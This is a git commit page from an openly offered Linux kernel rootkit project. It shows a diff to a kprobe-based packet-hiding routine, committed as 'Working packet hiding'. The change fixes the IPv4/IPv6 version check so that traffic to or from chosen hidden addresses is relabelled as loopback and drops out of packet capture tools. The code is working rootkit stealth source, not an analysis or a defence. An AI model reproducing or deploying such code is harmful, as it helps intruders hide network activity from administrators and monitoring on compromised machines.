linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit 47908e222b904b0b631c42fed77d1dd0752aa427
parent 52c256e87c0f24839b44d8741f07e3e5aed98c9e
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Sun, 20 Dec 2020 01:05:47 +0100

Working packet hiding

Diffstat:

Msrc/packhide.c | 20+++++++++++---------


1 file changed, 11 insertions(+), 9 deletions(-)

diff --git a/src/packhide.c b/src/packhide.c
@@ -116,24 +116,26 @@ g7_packet_rcv(struct kprobe *kp, struct pt_regs *pt_regs)
     char *data = skb_network_header(skb);
     char ver = data[0];
 
+    ver &= 0xf0;
+
     struct sk_buff *clone = skb_clone(skb, GFP_KERNEL);
     pt_regs->di = (long unsigned int)clone;
 
-    if ((ver & 0x40)) {
-        struct iphdr *iphdr;
-
-        iphdr = ip_hdr(clone);
-
-        if (list_contains_ip(&hidden_ips, (u8 *)&iphdr->saddr, v4)
-            || list_contains_ip(&hidden_ips, (u8 *)&iphdr->daddr, v4))
-            clone->pkt_type = PACKET_LOOPBACK;
-    } else if ((ver & 0x60)) {
+    if ((ver == 0x60)) {
         struct ipv6hdr *iphdr;
 
         iphdr = ipv6_hdr(clone);
 
         if (list_contains_ip(&hidden_ips, (u8 *)&iphdr->saddr, v6)
             || list_contains_ip(&hidden_ips, (u8 *)&iphdr->daddr, v6))
+                clone->pkt_type = PACKET_LOOPBACK;
+    } else if ((ver == 0x40)) {
+        struct iphdr *iphdr;
+
+        iphdr = ip_hdr(clone);
+
+        if (list_contains_ip(&hidden_ips, (u8 *)&iphdr->saddr, v4)
+            || list_contains_ip(&hidden_ips, (u8 *)&iphdr->daddr, v4))
             clone->pkt_type = PACKET_LOOPBACK;
     }